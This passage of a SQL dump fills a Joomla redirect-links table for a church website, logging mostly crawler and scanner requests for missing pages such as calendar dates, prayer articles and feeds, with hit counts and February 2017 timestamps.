(3286, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/15/-', NULL, '', '', 1, 0, '2017-02-01 17:23:51', '0000-00-00 00:00:00', 301),
(3287, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/16/-', NULL, '', '', 1, 0, '2017-02-01 17:27:38', '0000-00-00 00:00:00', 301),
(3288, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/4/-', NULL, '', '', 1, 0, '2017-02-01 17:31:26', '0000-00-00 00:00:00', 301),
(3289, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/7/-', NULL, '', '', 1, 0, '2017-02-01 17:35:13', '0000-00-00 00:00:00', 301),
(3290, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/16/-', NULL, '', '', 1, 0, '2017-02-01 17:39:01', '0000-00-00 00:00:00', 301),
(3291, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/20/-', NULL, '', '', 1, 0, '2017-02-01 17:42:48', '0000-00-00 00:00:00', 301),
(3292, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/13/-', NULL, '', '', 1, 0, '2017-02-01 17:46:35', '0000-00-00 00:00:00', 301),
(3293, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/1/-', NULL, '', '', 1, 0, '2017-02-01 17:50:23', '0000-00-00 00:00:00', 301),
(3294, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/29/-', NULL, '', '', 1, 0, '2017-02-01 17:54:10', '0000-00-00 00:00:00', 301),
(3295, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2001/8/9/-', NULL, '', '', 1, 0, '2017-02-01 17:57:59', '0000-00-00 00:00:00', 301),
(3296, 'http://lifeoasisinternationalchurch.org/livestraming', NULL, '', '', 1, 0, '2017-02-01 18:00:33', '0000-00-00 00:00:00', 301),
(3297, 'http://lifeoasisinternationalchurch.org/media.html', NULL, '', '', 6, 0, '2017-02-01 18:18:01', '0000-00-00 00:00:00', 301),
(3298, 'http://www.lifeoasisinternationalchurch.org/readme.html', NULL, 'http://www.lifeoasisinternationalchurch.org/readme.html', '', 6, 0, '2017-02-01 18:26:12', '0000-00-00 00:00:00', 301),
(3299, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=church&format=feed&limitstart=&type=atom&Itemid=775', NULL, '', '', 1, 0, '2017-02-01 19:01:40', '0000-00-00 00:00:00', 301),
(3300, 'http://lifeoasisinternationalchurch.org/149-day222014-4', NULL, '', '', 1, 0, '2017-02-01 19:54:30', '0000-00-00 00:00:00', 301),
(3301, 'http://lifeoasisinternationalchurch.org/172-prayerfocus192014', NULL, '', '', 1, 0, '2017-02-01 19:54:31', '0000-00-00 00:00:00', 301),
(3302, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=arrowthemes&format=feed&limitstart=&type=rss&Itemid=626', NULL, '', '', 1, 0, '2017-02-01 20:17:46', '0000-00-00 00:00:00', 301),
(3303, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Lighthouse&format=feed&limitstart=', NULL, '', '', 1, 0, '2017-02-01 21:33:19', '0000-00-00 00:00:00', 301),
(3304, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&format=feed&limitstart=&type=rss', NULL, '', '', 1, 0, '2017-02-01 22:49:00', '0000-00-00 00:00:00', 301),
(3305, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Lighthouse&format=feed&limitstart=&type=atom', NULL, '', '', 1, 0, '2017-02-01 23:14:44', '0000-00-00 00:00:00', 301),
(3306, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=music&format=feed&limitstart=&Itemid=626', NULL, '', '', 1, 0, '2017-02-01 23:17:28', '0000-00-00 00:00:00', 301),
(3307, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=arrowthemes&format=feed&limitstart=&Itemid=626', NULL, '', '', 1, 0, '2017-02-01 23:32:28', '0000-00-00 00:00:00', 301),
(3308, 'http://lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/08/02/15', NULL, '', '', 1, 0, '2017-02-02 00:38:48', '0000-00-00 00:00:00', 301),
(3309, 'http://lifeoasisinternationalchurch.org/prayer/145-2014-16', NULL, '', '', 1, 0, '2017-02-02 00:38:48', '0000-00-00 00:00:00', 301),
(3310, 'http://lifeoasisinternationalchurch.org/index.php?option=com_user&task=register', NULL, '', '', 6, 0, '2017-02-02 00:39:42', '0000-00-00 00:00:00', 301),
(3311, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/7/20/-', NULL, '', '', 1, 0, '2017-02-02 00:42:15', '0000-00-00 00:00:00', 301),
(3312, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/11/2/-', NULL, '', '', 1, 0, '2017-02-02 00:43:57', '0000-00-00 00:00:00', 301),
(3313, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/4/30/-', NULL, '', '', 1, 0, '2017-02-02 08:43:45', '0000-00-00 00:00:00', 301),
(3314, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/9/24/-', NULL, '', '', 1, 0, '2017-02-02 08:43:57', '0000-00-00 00:00:00', 301),
(3315, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/7/9/-', NULL, '', '', 1, 0, '2017-02-02 08:44:08', '0000-00-00 00:00:00', 301),
(3316, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/8/11/-', NULL, '', '', 1, 0, '2017-02-02 08:44:20', '0000-00-00 00:00:00', 301),
(3317, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/3/11/-', NULL, '', '', 1, 0, '2017-02-02 08:44:33', '0000-00-00 00:00:00', 301),
(3318, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/3/9/-', NULL, '', '', 1, 0, '2017-02-02 08:44:44', '0000-00-00 00:00:00', 301),
(3319, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2001/8/21/-', NULL, '', '', 1, 0, '2017-02-02 08:44:55', '0000-00-00 00:00:00', 301),
(3320, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/4/27/-', NULL, '', '', 1, 0, '2017-02-02 08:45:18', '0000-00-00 00:00:00', 301),
(3321, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/10/4/-', NULL, '', '', 1, 0, '2017-02-02 08:45:29', '0000-00-00 00:00:00', 301),
(3322, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/11/15/-', NULL, '', '', 1, 0, '2017-02-02 08:45:45', '0000-00-00 00:00:00', 301),
(3323, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/9/3/-', NULL, '', '', 1, 0, '2017-02-02 08:45:52', '0000-00-00 00:00:00', 301),
(3324, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/3/10/-', NULL, '', '', 1, 0, '2017-02-02 08:46:04', '0000-00-00 00:00:00', 301),
(3325, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/9/27/-', NULL, '', '', 1, 0, '2017-02-02 08:46:15', '0000-00-00 00:00:00', 301),
(3326, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/9/13/-', NULL, '', '', 1, 0, '2017-02-02 08:46:27', '0000-00-00 00:00:00', 301),
(3327, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/11/12/-', NULL, '', '', 1, 0, '2017-02-02 08:46:39', '0000-00-00 00:00:00', 301),
(3328, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/9/27/-', NULL, '', '', 1, 0, '2017-02-02 08:46:49', '0000-00-00 00:00:00', 301),
(3329, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/3/14/-', NULL, '', '', 1, 0, '2017-02-02 08:47:01', '0000-00-00 00:00:00', 301),
(3330, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/6/22/-', NULL, '', '', 1, 0, '2017-02-02 08:47:15', '0000-00-00 00:00:00', 301),
(3331, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/10/30/-', NULL, '', '', 1, 0, '2017-02-02 08:47:24', '0000-00-00 00:00:00', 301),
(3332, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/9/17/-', NULL, '', '', 1, 0, '2017-02-02 08:47:37', '0000-00-00 00:00:00', 301),
(3333, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/9/9/-', NULL, '', '', 1, 0, '2017-02-02 08:47:47', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(3334, 'http://lifeoasisinternationalchurch.org/prayer-request/14-contact-us', NULL, '', '', 2, 0, '2017-02-02 08:48:28', '0000-00-00 00:00:00', 301),
(3335, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/10/26/-', NULL, '', '', 1, 0, '2017-02-02 08:49:08', '0000-00-00 00:00:00', 301),
(3336, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/1/27/-', NULL, '', '', 1, 0, '2017-02-02 08:49:32', '0000-00-00 00:00:00', 301),
(3337, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/6/30/-', NULL, '', '', 1, 0, '2017-02-02 08:50:16', '0000-00-00 00:00:00', 301),
(3338, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/5/13/-', NULL, '', '', 1, 0, '2017-02-02 08:50:58', '0000-00-00 00:00:00', 301),
(3339, 'http://www.lifeoasisinternationalchurch.org/prayer/63-day-11', NULL, 'https://www.google.com/', '', 6, 0, '2017-02-02 09:32:19', '0000-00-00 00:00:00', 301),
(3340, 'http://lifeoasisinternationalchurch.org/index.php/150-day-23', NULL, '', '', 1, 0, '2017-02-02 09:34:23', '0000-00-00 00:00:00', 301),
(3341, 'http://www.lifeoasisinternationalchurch.org/devotional/', NULL, '', '', 2, 0, '2017-02-02 11:55:28', '0000-00-00 00:00:00', 301),
(3342, 'http://www.lifeoasisinternationalchurch.org/index.php/13-2014fasting-prayer/175-day72014', NULL, '', '', 8, 0, '2017-02-02 12:11:15', '0000-00-00 00:00:00', 301),
(3343, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/9/15/-', NULL, '', '', 1, 0, '2017-02-02 19:23:11', '0000-00-00 00:00:00', 301),
(3344, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/12/29/-', NULL, '', '', 1, 0, '2017-02-02 19:23:21', '0000-00-00 00:00:00', 301),
(3345, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2038/11/3/-', NULL, '', '', 1, 0, '2017-02-02 19:23:34', '0000-00-00 00:00:00', 301),
(3346, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/3/22/-', NULL, '', '', 1, 0, '2017-02-02 19:23:46', '0000-00-00 00:00:00', 301),
(3347, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/2/25/-', NULL, '', '', 1, 0, '2017-02-02 19:23:58', '0000-00-00 00:00:00', 301),
(3348, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/4/15/-', NULL, '', '', 1, 0, '2017-02-02 19:24:10', '0000-00-00 00:00:00', 301),
(3349, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/8/24/-', NULL, '', '', 1, 0, '2017-02-02 19:24:22', '0000-00-00 00:00:00', 301),
(3350, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/4/17/-', NULL, '', '', 1, 0, '2017-02-02 19:24:45', '0000-00-00 00:00:00', 301),
(3351, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/2/17/-', NULL, '', '', 1, 0, '2017-02-02 19:24:56', '0000-00-00 00:00:00', 301),
(3352, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/1/26/-', NULL, '', '', 1, 0, '2017-02-02 19:25:18', '0000-00-00 00:00:00', 301),
(3353, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/4/23/-', NULL, '', '', 1, 0, '2017-02-02 19:25:29', '0000-00-00 00:00:00', 301),
(3354, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/4/3/-', NULL, '', '', 1, 0, '2017-02-02 19:25:40', '0000-00-00 00:00:00', 301),
(3355, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/9/25/-', NULL, '', '', 1, 0, '2017-02-02 19:25:51', '0000-00-00 00:00:00', 301),
(3356, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/5/9/-', NULL, '', '', 1, 0, '2017-02-02 19:26:02', '0000-00-00 00:00:00', 301),
(3357, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/7/6/-', NULL, '', '', 1, 0, '2017-02-02 19:26:13', '0000-00-00 00:00:00', 301),
(3358, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/1/18/-', NULL, '', '', 1, 0, '2017-02-02 19:26:24', '0000-00-00 00:00:00', 301),
(3359, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2001/8/28/-', NULL, '', '', 1, 0, '2017-02-02 19:26:35', '0000-00-00 00:00:00', 301),
(3360, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2001/8/19/-', NULL, '', '', 1, 0, '2017-02-02 19:26:46', '0000-00-00 00:00:00', 301),
(3361, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/5/12/-', NULL, '', '', 1, 0, '2017-02-02 19:26:57', '0000-00-00 00:00:00', 301),
(3362, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2038/11/8/-', NULL, '', '', 1, 0, '2017-02-02 19:27:08', '0000-00-00 00:00:00', 301),
(3363, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/6/25/-', NULL, '', '', 1, 0, '2017-02-02 19:27:19', '0000-00-00 00:00:00', 301),
(3364, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/7/24/-', NULL, '', '', 1, 0, '2017-02-02 19:27:30', '0000-00-00 00:00:00', 301),
(3365, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/8/17/-', NULL, '', '', 1, 0, '2017-02-02 19:27:42', '0000-00-00 00:00:00', 301),
(3366, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/4/15/-', NULL, '', '', 1, 0, '2017-02-02 19:27:53', '0000-00-00 00:00:00', 301),
(3367, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/12/10/-', NULL, '', '', 1, 0, '2017-02-02 19:32:19', '0000-00-00 00:00:00', 301),
(3368, 'http://www.lifeoasisinternationalchurch.org/template-info-2/the-church', NULL, '', '', 25, 0, '2017-02-02 20:32:55', '0000-00-00 00:00:00', 301),
(3369, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/12-prayer-a-fasting-day-3', NULL, '', '', 3, 0, '2017-02-02 21:27:44', '0000-00-00 00:00:00', 301),
(3370, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/18', NULL, '', '', 1, 0, '2017-02-02 22:41:31', '0000-00-00 00:00:00', 301),
(3371, 'http://www.lifeoasisinternationalchurch.org/template-info/music', NULL, '', '', 1, 0, '2017-02-03 00:09:17', '0000-00-00 00:00:00', 301),
(3372, 'http://lifeoasisinternationalchurch.org/prayer/124-prayer-focus-for-day-35', NULL, '', '', 1, 0, '2017-02-03 00:14:33', '0000-00-00 00:00:00', 301),
(3373, 'http://www.lifeoasisinternationalchurch.org/contact-us/prayer-request', NULL, '', '', 5, 0, '2017-02-03 00:42:05', '0000-00-00 00:00:00', 301),
(3374, 'http://ljmti.lifeoasisinternationalchurch.org/?Itemid=165', NULL, '', '', 1, 0, '2017-02-03 01:52:37', '0000-00-00 00:00:00', 301),
(3375, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/15-prayer-a-fasting-day-6', NULL, '', '', 1, 0, '2017-02-03 02:29:46', '0000-00-00 00:00:00', 301),
(3376, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/10/11/-', NULL, '', '', 1, 0, '2017-02-03 04:07:56', '0000-00-00 00:00:00', 301),
(3377, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/4/10/-', NULL, '', '', 1, 0, '2017-02-03 04:08:04', '0000-00-00 00:00:00', 301),
(3378, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2038/11/11/-', NULL, '', '', 1, 0, '2017-02-03 04:08:17', '0000-00-00 00:00:00', 301),
(3379, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2001/8/13/-', NULL, '', '', 1, 0, '2017-02-03 04:08:29', '0000-00-00 00:00:00', 301),
(3380, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2001/8/3/-', NULL, '', '', 1, 0, '2017-02-03 04:08:41', '0000-00-00 00:00:00', 301),
(3381, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2001/8/29/-', NULL, '', '', 1, 0, '2017-02-03 04:08:53', '0000-00-00 00:00:00', 301),
(3382, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/6/13/-', NULL, '', '', 1, 0, '2017-02-03 04:09:16', '0000-00-00 00:00:00', 301),
(3383, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/1/23/-', NULL, '', '', 1, 0, '2017-02-03 04:09:27', '0000-00-00 00:00:00', 301),
(3384, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/6/24/-', NULL, '', '', 1, 0, '2017-02-03 04:09:39', '0000-00-00 00:00:00', 301),
(3385, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/8/19/-', NULL, '', '', 1, 0, '2017-02-03 04:09:51', '0000-00-00 00:00:00', 301),
(3386, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/11/6/-', NULL, '', '', 1, 0, '2017-02-03 04:10:02', '0000-00-00 00:00:00', 301),
(3387, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/12/23/-', NULL, '', '', 1, 0, '2017-02-03 04:10:14', '0000-00-00 00:00:00', 301),
(3388, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/9/23/-', NULL, '', '', 1, 0, '2017-02-03 04:10:25', '0000-00-00 00:00:00', 301),
(3389, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/8/13/-', NULL, '', '', 1, 0, '2017-02-03 04:10:37', '0000-00-00 00:00:00', 301),
(3390, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/2/9/-', NULL, '', '', 1, 0, '2017-02-03 04:10:49', '0000-00-00 00:00:00', 301),
(3391, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/10/19/-', NULL, '', '', 1, 0, '2017-02-03 04:11:00', '0000-00-00 00:00:00', 301),
(3392, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/6/26/-', NULL, '', '', 1, 0, '2017-02-03 04:11:12', '0000-00-00 00:00:00', 301),
(3393, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/8/22/-', NULL, '', '', 1, 0, '2017-02-03 04:11:24', '0000-00-00 00:00:00', 301),
(3394, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/8/18/-', NULL, '', '', 1, 0, '2017-02-03 04:11:35', '0000-00-00 00:00:00', 301),
(3395, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/10/3/-', NULL, '', '', 1, 0, '2017-02-03 04:11:47', '0000-00-00 00:00:00', 301),
(3396, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/5/21/-', NULL, '', '', 1, 0, '2017-02-03 04:11:59', '0000-00-00 00:00:00', 301),
(3397, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/11/1/-', NULL, '', '', 1, 0, '2017-02-03 04:12:11', '0000-00-00 00:00:00', 301),
(3398, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2000/4/12/-', NULL, '', '', 1, 0, '2017-02-03 04:12:23', '0000-00-00 00:00:00', 301),
(3399, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/4/4/-', NULL, '', '', 1, 0, '2017-02-03 04:12:35', '0000-00-00 00:00:00', 301),
(3400, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/1/17/-', NULL, '', '', 1, 0, '2017-02-03 04:12:49', '0000-00-00 00:00:00', 301),
(3401, 'http://www.lifeoasisinternationalchurch.org/resources/blog/item/2017)_files/0', NULL, '', '', 2, 0, '2017-02-03 07:34:59', '0000-00-00 00:00:00', 301),
(3402, 'http://ljmti.lifeoasisinternationalchurch.org/home/lifeoasi/public_html/ljmti/images/correct-banner.jpg', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-02-03 08:51:06', '0000-00-00 00:00:00', 301),
(3403, 'http://ljmti.lifeoasisinternationalchurch.org/images/correst-home.jpg', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-02-03 08:51:11', '0000-00-00 00:00:00', 301),
(3404, 'http://www.lifeoasisinternationalchurch.org/index.php/165-day-37', NULL, '', '', 5, 0, '2017-02-03 09:13:31', '0000-00-00 00:00:00', 301),
(3405, 'https://www.spiritmeat.net/resources/streaming-registered', NULL, '', '', 2, 0, '2017-02-03 09:40:57', '0000-00-00 00:00:00', 301),
(3406, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/18-prayer-a-fasting-day', NULL, '', '', 1, 0, '2017-02-03 09:42:22', '0000-00-00 00:00:00', 301),
(3407, 'http://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/12-sample-content-1', NULL, '', '', 2, 0, '2017-02-03 10:54:07', '0000-00-00 00:00:00', 301),
(3408, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/17-prayer-a-fasting-day-8', NULL, '', '', 4, 0, '2017-02-03 11:05:19', '0000-00-00 00:00:00', 301),
(3409, 'http://www.lifeoasisinternationalchurch.org/index.php/280-day-20-of-21-days-fasting-and-prayer-november', NULL, 'http://www.lifeoasisinternationalchurch.org/prayer/index.php/234-2016-day-17', '', 11, 0, '2017-02-03 23:03:23', '0000-00-00 00:00:00', 301),
(3410, 'http://www.lifeoasisinternationalchurch.org/index.php/279-day-19-of-21-days-fasting-and-prayer-november', NULL, 'http://www.lifeoasisinternationalchurch.org/prayer/index.php/234-2016-day-17', '', 9, 0, '2017-02-03 23:03:29', '0000-00-00 00:00:00', 301),
(3411, 'http://www.lifeoasisinternationalchurch.org/index.php/272-day-12-of-21-days-fasting-and-prayer-november', NULL, 'http://www.lifeoasisinternationalchurch.org/prayer/index.php/234-2016-day-17', '', 9, 0, '2017-02-03 23:03:47', '0000-00-00 00:00:00', 301),
(3412, 'http://www.lifeoasisinternationalchurch.org/index.php/271-day-11-of-21-days-fasting-and-prayer-november', NULL, 'http://www.lifeoasisinternationalchurch.org/prayer/index.php/234-2016-day-17', '', 10, 0, '2017-02-03 23:03:48', '0000-00-00 00:00:00', 301),
(3413, 'http://www.lifeoasisinternationalchurch.org/index.php/270-day-10-of-21-days-fasting-and-prayer-november', NULL, 'http://www.lifeoasisinternationalchurch.org/prayer/index.php/234-2016-day-17', '', 10, 0, '2017-02-03 23:03:48', '0000-00-00 00:00:00', 301),
(3414, 'http://lifeoasisinternationalchurch.org/resources/blog/item/', NULL, '', '', 6, 0, '2017-02-04 06:09:09', '0000-00-00 00:00:00', 301),
(3415, 'http://lifeoasisinternationalchurch.org/resources/blog/it', NULL, '', '', 5, 0, '2017-02-04 06:09:09', '0000-00-00 00:00:00', 301),
(3416, 'http://lifeoasisinternationalchurch.org/resources/blog/item', NULL, '', '', 7, 0, '2017-02-04 06:09:09', '0000-00-00 00:00:00', 301),
(3417, 'http://lifeoasisinternationalchurch.org/resources/blog/item/1', NULL, '', '', 1, 0, '2017-02-04 06:09:10', '0000-00-00 00:00:00', 301),
(3418, 'http://lifeoasisinternationalchurch.org/resources/blog/i', NULL, '', '', 5, 0, '2017-02-04 06:09:11', '0000-00-00 00:00:00', 301),
(3419, 'http://lifeoasisinternationalchurch.org/resources/blog/ite', NULL, '', '', 5, 0, '2017-02-04 06:09:11', '0000-00-00 00:00:00', 301),
(3420, 'http://lifeoasisinternationalchurch.org/index.php/154-day-27', NULL, '', '', 1, 0, '2017-02-04 13:10:26', '0000-00-00 00:00:00', 301),
(3421, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/7-tutorials', NULL, '', '', 7, 0, '2017-02-04 18:54:35', '0000-00-00 00:00:00', 301),
(3422, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 2, 0, '2017-02-04 18:54:53', '0000-00-00 00:00:00', 301),
(3423, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 1, 0, '2017-02-04 19:08:09', '0000-00-00 00:00:00', 301),
(3424, 'http://lifeoasisinternationalchurch.org/gobc2009/ministry.html', NULL, '', '', 1, 0, '2017-02-04 19:33:18', '0000-00-00 00:00:00', 301),
(3425, 'http://lifeoasisinternationalchurch.org/gobc2009/programmes.html', NULL, '', '', 1, 0, '2017-02-04 19:33:19', '0000-00-00 00:00:00', 301),
(3426, 'http://www.lifeoasisinternationalchurch.org/prayer/106-prayer-focus-for-day-15', NULL, '', '', 1, 0, '2017-02-04 20:32:31', '0000-00-00 00:00:00', 301),
(3427, 'http://lifeoasisinternationalchurch.org/index.php/18-loic/35-trm', NULL, '', '', 1, 0, '2017-02-04 20:36:25', '0000-00-00 00:00:00', 301),
(3428, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 4, 0, '2017-02-04 21:00:22', '0000-00-00 00:00:00', 301),
(3429, 'http://lifeoasisinternationalchurch.org/index.php/programme/18-loic/35-trm', NULL, '', '', 1, 0, '2017-02-04 21:55:23', '0000-00-00 00:00:00', 301),
(3430, 'http://lifeoasisinternationalchurch.org/index.php/253-day-16-of-21-days-fasting-and-prayer-october-3', NULL, '', '', 2, 0, '2017-02-04 22:13:08', '0000-00-00 00:00:00', 301),
(3431, 'http://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 2, 0, '2017-02-04 23:04:48', '0000-00-00 00:00:00', 301),
(3432, 'http://lifeoasisinternationalchurch.org/159-focus37', NULL, '', '', 1, 0, '2017-02-04 23:55:24', '0000-00-00 00:00:00', 301),
(3433, 'http://lifeoasisinternationalchurch.org/blog', NULL, '', '', 6, 0, '2017-02-05 01:49:14', '0000-00-00 00:00:00', 301),
(3434, 'http://lifeoasisinternationalchurch.org/index.php/heart', NULL, '', '', 2, 0, '2017-02-05 03:18:31', '0000-00-00 00:00:00', 301),
(3435, 'http://lifeoasisinternationalchurch.org/prayer/103-prayer-focus-for-day-12', NULL, '', '', 1, 0, '2017-02-05 06:19:16', '0000-00-00 00:00:00', 301),
(3436, 'http://lifeoasisinternationalchurch.org/vendor_extra/elfinder/php/connector.minimal.php', NULL, '', '', 1, 0, '2017-02-05 06:53:36', '0000-00-00 00:00:00', 301),
(3437, 'http://lifeoasisinternationalchurch.org/strelaming', NULL, '', '', 1, 0, '2017-02-05 07:34:40', '0000-00-00 00:00:00', 301),
(3438, 'http://www.lifeoasisinternationalchurch.org/streaming3', NULL, '', '', 2, 0, '2017-02-05 12:36:07', '0000-00-00 00:00:00', 301),
(3439, 'http://www.lifeoasisinternationalchurch.org//web/download_file.php', NULL, '', '', 1, 0, '2017-02-05 13:20:04', '0000-00-00 00:00:00', 301),
(3440, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/article/18-loic//web/download_file.php', NULL, '', '', 1, 0, '2017-02-05 13:20:06', '0000-00-00 00:00:00', 301),
(3441, 'http://lifeoasisinternationalchurch.org/index.php/wp-json/wp/v2/posts/', NULL, '', '', 10, 0, '2017-02-05 16:02:03', '0000-00-00 00:00:00', 301),
(3442, 'https://142.4.21.132/recordings/', NULL, '', '', 12, 0, '2017-02-05 20:51:17', '0000-00-00 00:00:00', 301),
